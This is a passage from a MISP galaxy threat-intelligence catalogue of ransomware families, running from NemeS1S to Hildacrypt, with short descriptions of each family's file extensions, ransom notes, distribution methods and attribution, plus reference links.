http://id-ransomware.blogspot.com/2018/06/donut-ransomware.html

NemeS1S Ransomware

Ransomware as a Service

The tag is: misp-galaxy:ransomware="NemeS1S Ransomware"

Table 5780. Table References
Links
https://twitter.com/Damian1338B/status/1005411102660923392
https://www.bleepingcomputer.com/news/security/nemes1s-raas-is-padcrypt-ransomwares-affiliate-system/
https://id-ransomware.blogspot.com/2017/01/nemesis-ransomware.html

Paradise Ransomware

MalwareHunterTeam discovered a new Paradise Ransomware variant that uses the extension _V.0.0.0.1{paradise@all-ransomware.info}.prt and drops a ransom note named PARADISE_README_paradise@all-ransomware.info.txt.

The tag is: misp-galaxy:ransomware="Paradise Ransomware"

Table 5781. Table References
Links
https://twitter.com/malwrhunterteam/status/1005420103415017472
https://twitter.com/malwrhunterteam/status/993499349199056897
http://id-ransomware.blogspot.com/2017/09/paradise-ransomware.html

B2DR Ransomware

uses the .reycarnasi1983@protonmail.com.gw3w amd a ransom note named ScrewYou.txt

The tag is: misp-galaxy:ransomware="B2DR Ransomware"

Table 5782. Table References
Links
https://twitter.com/demonslay335/status/1006220895302705154
https://id-ransomware.blogspot.com/2018/03/b2dr-ransomware.html

YYTO Ransomware

uses the extension .codyprince92@mail.com.ovgm and drops a ransom note named Readme.txt

The tag is: misp-galaxy:ransomware="YYTO Ransomware"

Table 5783. Table References
Links
https://twitter.com/demonslay335/status/1006237353474756610
http://id-ransomware.blogspot.com/2017/05/yyto-ransomware.html

Unnamed ramsomware 2

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 2"

Table 5784. Table References
Links
https://twitter.com/demonslay335/status/1007334654918250496

Everbe Ransomware

The tag is: misp-galaxy:ransomware="Everbe Ransomware"

Table 5785. Table References
Links
https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-everbe-ransomware/
https://twitter.com/malwrhunterteam/status/1065675918000234497
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/
http://id-ransomware.blogspot.com/2018/03/everbe-ransomware.html

DirCrypt

The tag is: misp-galaxy:ransomware="DirCrypt"

View relationships graph

DirCrypt has relationships with:

similar: misp-galaxy:malpedia="DirCrypt" with estimative-language:likelihood-probability="likely"

Table 5786. Table References
Links
https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/

DBGer Ransomware

The authors of the Satan ransomware have rebranded their "product" and they now go by the name of DBGer ransomware, according to security researcher MalwareHunter, who spotted this new version earlier today. The change was not only in name but also in the ransomware’s modus operandi. According to the researcher, whose discovery was later confirmed by an Intezer code similarity analysis, the new (Satan) DBGer ransomware now also incorporates Mimikatz, an open-source password-dumping utility. The purpose of DBGer incorporating Mimikatz is for lateral movement inside compromised networks. This fits a recently observed trend in Satan’s modus operandi.

The tag is: misp-galaxy:ransomware="DBGer Ransomware"

Table 5787. Table References
Links
https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/
http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html

RASTAKHIZ

Hidden Tear variant discovered in October 2016. After activation, provides victims with an unlimited amount of time to gather the requested ransom money and pay it. Related unlock keys and the response sent to and from a Gmail addres

The tag is: misp-galaxy:ransomware="RASTAKHIZ"

Table 5788. Table References
Links
https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf[https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf]
https://id-ransomware.blogspot.com/2017/11/rastakhiz-ransomware.html

TYRANT

DUMB variant discovered on November 16, 2017. Disguised itself as a popular virtual private network (VPN) in Iran known as Psiphon and infected Iranian users. Included Farsi-language ransom note, decryptable in the same way as previous DUMB-based variants. Message requested only US$15 for unlock key. Advertised two local and Iran-based payment processors: exchange.ir and webmoney.ir.Shared unique and specialized indicators with RASTAKHIZ; iDefense threat intelligence analysts believe this similarity confirms that the same actor was behind the repurposing of both types of ransomware.

The tag is: misp-galaxy:ransomware="TYRANT"

TYRANT is also known as:

Crypto Tyrant

Table 5789. Table References
Links
https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf[https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf]
http://id-ransomware.blogspot.com/2017/10/tyrant-ransomware.html

WannaSmile

zCrypt variant discovered on November 17, 2017, one day after the discovery of TYRANT. Used Farsi-language ransom note asking for a staggering 20 Bitcoin ransom payment. Also advertised local Iran-based payment processors and exchanges—www.exchangeing[.]ir, www.payment24[.]ir, www.farhadexchange.net, and www.digiarz.com)—through which Bitcoins could be acquired.

The tag is: misp-galaxy:ransomware="WannaSmile"

Table 5790. Table References
Links
https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf[https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf]
https://id-ransomware.blogspot.com/2017/11/wannasmile-ransomware.html

Unnamed Android Ransomware

Uses APK Editor Pro. Picks and activates DEX>Smali from APK Editor. Utilizes LockService application and edits the “const-string v4, value” to a desired unlock key. Changes contact information within the ransom note. Once the victim has downloaded the malicious app, the only way to recover its content is to pay the ransom and receive the unlock key.

The tag is: misp-galaxy:ransomware="Unnamed Android Ransomware"

Table 5791. Table References
Links
https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf[https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf]

KEYPASS

A new distribution campaign is underway for a STOP Ransomware variant called KeyPass based on the amount of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.

The tag is: misp-galaxy:ransomware="KEYPASS"

KEYPASS is also known as:

KeyPass

Table 5792. Table References
Links
https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/
https://www.kaspersky.com/blog/keypass-ransomware/23447/

STOP Ransomware

Emmanuel_ADC-Soft found a new STOP Ransomware variant that appends the .INFOWAIT extension and drops a ransom note named !readme.txt.

The tag is: misp-galaxy:ransomware="STOP Ransomware"

Table 5793. Table References
Links
https://twitter.com/Emm_ADC_Soft/status/1064459080016760833
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/
https://twitter.com/MarceloRivero/status/1065694365056679936
http://id-ransomware.blogspot.com/2017/12/stop-ransomware.html

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware

A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a "tip" to decrypt the files.

The tag is: misp-galaxy:ransomware="Barack Obama’s Everlasting Blue Blackmail Virus Ransomware"

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware is also known as:

Barack Obama’s Blackmail Virus Ransomware

Table 5794. Table References
Links
https://twitter.com/malwrhunterteam/status/1032242391665790981
https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/
https://id-ransomware.blogspot.com/2018/08/barack-obamas-ransomware.html

CryptoNar

When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted. If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file’s name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file’s name.

The tag is: misp-galaxy:ransomware="CryptoNar"

View relationships graph

CryptoNar has relationships with:

similar: misp-galaxy:ransomware="CryptoJoker" with estimative-language:likelihood-probability="likely"

Table 5795. Table References
Links
https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/
https://twitter.com/malwrhunterteam/status/1034492151541977088
https://id-ransomware.blogspot.com/2018/08/cryptonar-ransomware.html

CreamPie Ransomware

Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.

The tag is: misp-galaxy:ransomware="CreamPie Ransomware"

Table 5796. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/
https://twitter.com/JakubKroustek/status/1033656080839139333
https://id-ransomware.blogspot.com/2018/08/creampie-ransomware.html

Jeff the Ransomware

Looks to be in-development as it does not encrypt.

The tag is: misp-galaxy:ransomware="Jeff the Ransomware"

Table 5797. Table References
Links
https://twitter.com/leotpsc/status/1033625496003731458
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

Cassetto Ransomware

Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.

The tag is: misp-galaxy:ransomware="Cassetto Ransomware"

Table 5798. Table References
Links
https://twitter.com/demonslay335/status/1034213399922524160
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/
https://id-ransomware.blogspot.com/2018/08/cassetto-ransomware.html

Acroware Cryptolocker Ransomware

Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.

The tag is: misp-galaxy:ransomware="Acroware Cryptolocker Ransomware"

Acroware Cryptolocker Ransomware is also known as:

Acroware Screenlocker

Table 5799. Table References
Links
https://twitter.com/leotpsc/status/1034346447112679430
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

Termite Ransomware

Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.

The tag is: misp-galaxy:ransomware="Termite Ransomware"

Table 5800. Table References
Links
https://twitter.com/B_H101/status/1034379267956715520
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

PICO Ransomware

S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.

The tag is: misp-galaxy:ransomware="PICO Ransomware"

PICO Ransomware is also known as:

Pico Ransomware

Table 5801. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/
https://twitter.com/siri_urz/status/1035138577934557184

Sigma Ransomware

Today one of our volunteers, Aura, told me about a new new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipients computer.

The tag is: misp-galaxy:ransomware="Sigma Ransomware"

Table 5802. Table References
Links
https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/

Crypt0saur

The tag is: misp-galaxy:ransomware="Crypt0saur"

Mongo Lock

An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.

The tag is: misp-galaxy:ransomware="Mongo Lock"

Table 5803. Table References
Links
https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/

Kraken Cryptor Ransomware

The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it.

The tag is: misp-galaxy:ransomware="Kraken Cryptor Ransomware"

Table 5804. Table References
Links
https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-now-installing-the-kraken-cryptor-ransomware/
https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/
https://twitter.com/MarceloRivero/status/1059575186117328898
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

SAVEfiles

The tag is: misp-galaxy:ransomware="SAVEfiles"

Table 5805. Table References
Links
https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/

File-Locker

The File-Locker Ransomware is a Hidden Tear variant that is targeting victims in Korea. When victim’s are infected it will leave a ransom requesting 50,000 Won, or approximately 50 USD, to get the files back. This ransomware uses AES encryption with a static password of "dnwls07193147", so it is easily decryptable.

The tag is: misp-galaxy:ransomware="File-Locker"

Table 5806. Table References
Links
https://www.bleepingcomputer.com/news/security/file-locker-ransomware-targets-korean-victims-and-asks-for-50k-won/

CommonRansom

A new ransomware called CommonRansom was discovered that has a very bizarre request. In order to decrypt a computer after a payment is made, they require the victim to open up Remote Desktop Services on the affected computer and send them admin credentials in order to decrypt the victim’s files.

The tag is: misp-galaxy:ransomware="CommonRansom"

Table 5807. Table References
Links
https://www.bleepingcomputer.com/news/security/commonransom-ransomware-demands-rdp-access-to-decrypt-files/

God Crypt Joke Ransomware

MalwareHunterTeam found a new ransomware called God Crypt that does not appear to decrypt and appears to be a joke ransomware. Has an unlock code of 29b579fb811f05c3c334a2bd2646a27a.

The tag is: misp-galaxy:ransomware="God Crypt Joke Ransomware"

God Crypt Joke Ransomware is also known as:

Godsomware v1.0
Ransomware God Crypt

Table 5808. Table References
Links
https://twitter.com/malwrhunterteam/status/1048616343975682048
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

DecryptFox Ransomware

Michael Gillespie found a new ransomware uploaded to ID Ransomware that appends the .encr extension and drops a ransom note named readmy.txt.

The tag is: misp-galaxy:ransomware="DecryptFox Ransomware"

Table 5809. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/
https://twitter.com/demonslay335/status/1049325784979132417

garrantydecrypt

Michael Gillespie found a new ransomware that appends the .garrantydecrypt extension and drops a ransom note named RECOVERY_FILES.txt

The tag is: misp-galaxy:ransomware="garrantydecrypt"

Table 5810. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/
https://www.bleepingcomputer.com/news/security/ransomware-pretends-to-be-proton-security-team-securing-data-from-hackers/

MVP Ransomware

Siri discovered a new ransomware that is appending the .mvp extension to encrypted files.

The tag is: misp-galaxy:ransomware="MVP Ransomware"

Table 5811. Table References
Links
https://twitter.com/siri_urz/status/1039077365039673344
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

StorageCrypter

Michael Gillespie noticed numerous submissions to ID Ransomware from South Korea for the StorageCrypter ransomware. This version is using a new ransom note named read_me_for_recover_your_files.txt.

The tag is: misp-galaxy:ransomware="StorageCrypter"

StorageCrypter is also known as:

SambaCry

Table 5812. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

Rektware

GrujaRS discovered a new ransomware called Rektware that appends the .CQScSFy extension

The tag is: misp-galaxy:ransomware="Rektware"

Table 5813. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/
https://twitter.com/GrujaRS/status/1040677247735279616

M@r1a ransomware

The tag is: misp-galaxy:ransomware="M@r1a ransomware"

M@r1a ransomware is also known as:

M@r1a
BlackHeart

Table 5814. Table References
Links
https://twitter.com/malwrhunterteam/status/1058775145005887489
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

"prepending (enc) ransomware" (Not an official name)

The tag is: misp-galaxy:ransomware=""prepending (enc) ransomware" (Not an official name)"

"prepending (enc) ransomware" (Not an official name) is also known as:

Aperfectday2018

Table 5815. Table References
Links
https://twitter.com/demonslay335/status/1059470985055875074
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

PyCL Ransomware

The tag is: misp-galaxy:ransomware="PyCL Ransomware"

PyCL Ransomware is also known as:

Dxh26wam

Table 5816. Table References
Links
https://twitter.com/demonslay335/status/1060921043957755904

Vapor Ransomware

MalwareHunterTeam discovered the Vapor Ransomware that appends the .Vapor extension to encrypted files. Will delete files if you do not pay in time.

The tag is: misp-galaxy:ransomware="Vapor Ransomware"

Table 5817. Table References
Links
https://twitter.com/malwrhunterteam/status/1063769884608348160
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

EnyBenyHorsuke Ransomware

GrujaRS discovered a new ransomware called EnyBenyHorsuke Ransomware that appends the .Horsuke extension to encrypted files.

The tag is: misp-galaxy:ransomware="EnyBenyHorsuke Ransomware"

Table 5818. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/
https://twitter.com/GrujaRS/status/1063930127610986496

DeLpHiMoRix

The tag is: misp-galaxy:ransomware="DeLpHiMoRix"

DeLpHiMoRix is also known as:

DelphiMorix
DelphiMorix!

Table 5819. Table References
Links
https://twitter.com/petrovic082/status/1065223932637315074
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/
https://twitter.com/demonslay335/status/1066099799705960448

EnyBeny Nuclear Ransomware

@GrujaRS discovered a new in-dev ransomware called EnyBeny Nuclear Ransomware that meant to append the extension .PERSONAL_ID:.Nuclear to encrypted files, but failed due to a bug.

The tag is: misp-galaxy:ransomware="EnyBeny Nuclear Ransomware"

Table 5820. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/
https://twitter.com/GrujaRS/status/1066799421080461312
https://www.youtube.com/watch?v=_aaFon7FVbc

Lucky Ransomware

Michael Gillespie discovered a new ransomware that renamed encrypted files to "[original].[random].lucky" and drops a ransom note named How_To_Decrypt_My_File.txt.

The tag is: misp-galaxy:ransomware="Lucky Ransomware"

Table 5821. Table References
Links
https://twitter.com/demonslay335/status/1067109661076262913
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/

WeChat Ransom

Over 100,000 thousand computers in China have been infected in just a few days with poorly-written ransomware that encrypts local files and steals credentials for multiple Chinese online services. The crooks show a screen titled UNNAMED1989 and demand the victim a ransom of 110 yuan ($16) in exchange for decrypting the files, payable via Tencent’s WeChat payment service by scanning a QR code.

The tag is: misp-galaxy:ransomware="WeChat Ransom"

WeChat Ransom is also known as:

UNNAMED1989

Table 5822. Table References
Links
https://www.bleepingcomputer.com/news/security/ransomware-infects-100k-pcs-in-china-demands-wechat-payment/
https://www.bleepingcomputer.com/news/security/chinese-police-arrest-dev-behind-unnamed1989-wechat-ransomware/

IsraBye

The tag is: misp-galaxy:ransomware="IsraBye"

Table 5823. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/
https://www.youtube.com/watch?v=QevoUzbqNTQ
https://twitter.com/GrujaRS/status/1070011234521673728

Dablio Ransomware

The tag is: misp-galaxy:ransomware="Dablio Ransomware"

View relationships graph

Dablio Ransomware has relationships with:

similar: misp-galaxy:ransomware="HolyCrypt" with estimative-language:likelihood-probability="likely"

Table 5824. Table References
Links
https://twitter.com/struppigel/status/1069905624954269696
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/

Gerber Ransomware 1.0

The tag is: misp-galaxy:ransomware="Gerber Ransomware 1.0"

Table 5825. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/
https://twitter.com/petrovic082/status/1071003939015925760
https://twitter.com/Emm_ADC_Soft/status/1071716275590782976

Gerber Ransomware 3.0

The tag is: misp-galaxy:ransomware="Gerber Ransomware 3.0"

Outsider

The tag is: misp-galaxy:ransomware="Outsider"

Table 5826. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/
https://twitter.com/GrujaRS/status/1071153192975642630
https://www.youtube.com/watch?v=iB019lDvArs

JungleSec

Uses http://ccrypt.sourceforge.net/ encryption program

The tag is: misp-galaxy:ransomware="JungleSec"

Table 5827. Table References
Links
https://twitter.com/demonslay335/status/1071123090564923393
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/

EQ Ransomware

GrujaRS discovered the EQ Ransomware that drops a ransom note named README_BACK_FILES.htm and uses .f**k (censored) as its extension for encrypted files. May be GlobeImposter.

The tag is: misp-galaxy:ransomware="EQ Ransomware"

Table 5828. Table References
Links
https://twitter.com/GrujaRS/status/1071349228172124160
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-14th-2018-slow-week/
https://www.youtube.com/watch?v=uHYY6XZZEw4

Mercury Ransomware

extension ".Mercury", note "!!!READ_IT!!!.txt" with 4 different 64-char hex as ID, 3 of which have dashes. Possible filemarker, same in different victim’s files.

The tag is: misp-galaxy:ransomware="Mercury Ransomware"

Table 5829. Table References
Links
https://twitter.com/demonslay335/status/1072164314608480257

Forma Ransomware

The tag is: misp-galaxy:ransomware="Forma Ransomware"

Forma Ransomware is also known as:

FORMA

Table 5830. Table References
Links
https://twitter.com/GrujaRS/status/1072468548977680385

Djvu

The tag is: misp-galaxy:ransomware="Djvu"

Table 5831. Table References
Links
https://twitter.com/demonslay335/status/1072907748155842565

Ryuk ransomware

Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD.

The tag is: misp-galaxy:ransomware="Ryuk ransomware"

Table 5832. Table References
Links
https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

BitPaymer

In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: misp-galaxy:ransomware="BitPaymer"

BitPaymer is also known as:

FriedEx
IEncrypt

Table 5833. Table References
Links
https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

LockerGoga

The tag is: misp-galaxy:ransomware="LockerGoga"

View relationships graph

LockerGoga has relationships with:

similar: misp-galaxy:ransomware="Nodera Ransomware" with estimative-language:likelihood-probability="roughly-even-chance"

Table 5834. Table References
Links
https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

Princess Evolution

We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig’s traffic stream dropping a then-unknown ransomware. Delving into this seemingly new ransomware, we checked its ransom payment page in the Tor network and saw it was called Princess Evolution (detected by Trend Micro as RANSOM_PRINCESSLOCKER.B), and was actually a new version of the Princess Locker ransomware that emerged in 2016. Based on its recent advertisement in underground forums, it appears that its operators are peddling Princess Evolution as a ransomware as a service (RaaS) and are looking for affiliates. The new malvertising campaign we observed since July 25 is notable in that the malvertisements included Coinhive (COINMINER_MALXMR.TIDBF). Even if users aren’t diverted to the exploit kit and infected with the ransomware, the cybercriminals can still earn illicit profit through cryptocurrency mining. Another characteristic of this new campaign is that they hosted their malvertisement page on a free web hosting service and used domain name system canonical name (DNS CNAME) to map their advertisement domain on a malicious webpage on the service.

The tag is: misp-galaxy:ransomware="Princess Evolution"

Princess Evolution is also known as:

PrincessLocker Evolution

Table 5835. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-as-a-service-princess-evolution-looking-for-affiliates/

Jokeroo

A new Ransomware-as-a-Service called Jokeroo is being promoted on underground hacking sites and via Twitter that allows affiliates to allegedly gain access to a fully functional ransomware and payment server. According to a malware researcher named Damian, the Jokeroo RaaS first started promoting itself as a GandCrab Ransomware RaaS on the underground hacking forum Exploit.in.

The tag is: misp-galaxy:ransomware="Jokeroo"

Jokeroo is also known as:

Fake GandCrab

Table 5836. Table References
Links
https://www.bleepingcomputer.com/news/security/jokeroo-ransomware-as-a-service-offers-multiple-membership-packages/

GlobeImposter

During December 2017, a new variant of the GlobeImposter Ransomware was detected for the first time and reported on malware-traffic-analysis. At first sight this ransomware looks very similar to other ransomware samples and uses common techniques such as process hollowing. However, deeper inspection showed that like LockPoS, which was analyzed by CyberBit, GlobeImposter too bypasses user-mode hooks by directly invoking system calls. Given this evasion technique is being leveraged by new malware samples may indicate that this is a beginning of a trend aiming to bypass user-mode security products.

The tag is: misp-galaxy:ransomware="GlobeImposter"

Table 5837. Table References
Links
https://www.fortinet.com/blog/threat-research/analysis-of-new-globeimposter-ransomware-variant.html

BlackWorm

BlackWorm Ransomware is a malicious computer infection that encrypts your files, and then does everything it can to prevent you from restoring them. It needs you to pay $200 for the decryption key, but there is no guarantee that the people behind this infection would really issue the decryption tool for you.

The tag is: misp-galaxy:ransomware="BlackWorm"

Table 5838. Table References
Links
https://spyware-techie.com/blackworm-ransomware-removal-guide

Tellyouthepass

Tellyouthepass is a ransomware that alters system files, registry entries and encodes personal photos, documents, and servers or archives. Army-grade encryption algorithms get used to change the original code of the file and make the data useless.

The tag is: misp-galaxy:ransomware="Tellyouthepass"

Table 5839. Table References
Links
https://malware.wikia.org/wiki/Tellyouthepass

BigBobRoss

BigBobRoss ransomware is the cryptovirus that requires a ransom in Bitcoin to return encrypted files marked with .obfuscated appendix.

The tag is: misp-galaxy:ransomware="BigBobRoss"

Table 5840. Table References
Links
https://www.2-spyware.com/remove-bigbobross-ransomware.html

Planetary

First discovered by malware security analyst, Lawrence Abrams, PLANETARY is an updated variant of another high-risk ransomware called HC7.

The tag is: misp-galaxy:ransomware="Planetary"

Table 5841. Table References
Links
https://www.pcrisk.com/removal-guides/12121-planetary-ransomware

Cr1ptT0r

Cr1ptT0r Ransomware Targets NAS Devices with Old Firmware.

The tag is: misp-galaxy:ransomware="Cr1ptT0r"

Cr1ptT0r is also known as:

Criptt0r
Cr1pt0r
Cripttor

Table 5842. Table References
Links
https://www.coveware.com/blog/2019/3/13/cr1ptt0r-ransomware-targets-nas-devices-with-old-firmware
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r

Sodinokibi

Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called "Sodinokibi." Sodinokibi attempts to encrypt data in a user’s directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco’s Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.

The tag is: misp-galaxy:ransomware="Sodinokibi"

Sodinokibi is also known as:

REvil
Revil

Table 5843. Table References
Links
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

Phobos

Phobos exploits open or poorly secured RDP ports to sneak inside networks and execute a ransomware attack, encrypting files and demanding a ransom be paid in bitcoin for returning the files, which in this case are locked with a .phobos extension.

The tag is: misp-galaxy:ransomware="Phobos"

Phobos is also known as:

Java NotDharma

Table 5844. Table References
Links
https://www.zdnet.com/article/new-phobos-ransomware-exploits-weak-security-to-hit-targets-around-the-world/

GetCrypt

A new ransomware is in the dark market which encrypts all the files on the device and redirects victims to the RIG exploit kit.

The tag is: misp-galaxy:ransomware="GetCrypt"

Table 5845. Table References
Links
https://www.ehackingnews.com/2019/05/getcrypt-ransomware-modus-operandi-and.html

Nemty

A new ransomware family dubbed “Nemty” for the extension it adds to encrypted files has recently surfaced in the wild. According to a report from Bleeping Computer, New York-based reverse engineer Vitali Kremez posits that Nemty is possibly delivered through exposed remote desktop connections.

The tag is: misp-galaxy:ransomware="Nemty"

Table 5846. Table References
Links
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/nemty-ransomware-possibly-spreads-through-exposed-remote-desktop-connections

Buran

Buran is a new version of the Vega ransomware strain (a.k.a. Jamper, Ghost, Buhtrap) that attacked accountants from February through April 2019. The new Buran ransomware first was discovered by nao_sec in June 2019, delivered by the RIG Exploit Kit, as reported by BleepingComputer.

The tag is: misp-galaxy:ransomware="Buran"

Table 5847. Table References
Links
https://www.acronis.com/en-us/blog/posts/meet-buran-new-delphi-ransomware-delivered-rig-exploit-kit

Hildacrypt

The Hildacrypt ransomware encrypts the victim’s files with a strong encryption algorithm and the filename extension .hilda until the victim pays a fee to get them back.

The tag is: misp-galaxy:ransomware="Hildacrypt"

Table 5848. Table References
Links
https://securitynews.sonicwall.com/xmlpost/hildacrypt-ransomware-actively-spreading-in-the-wild/

Mr.Dec

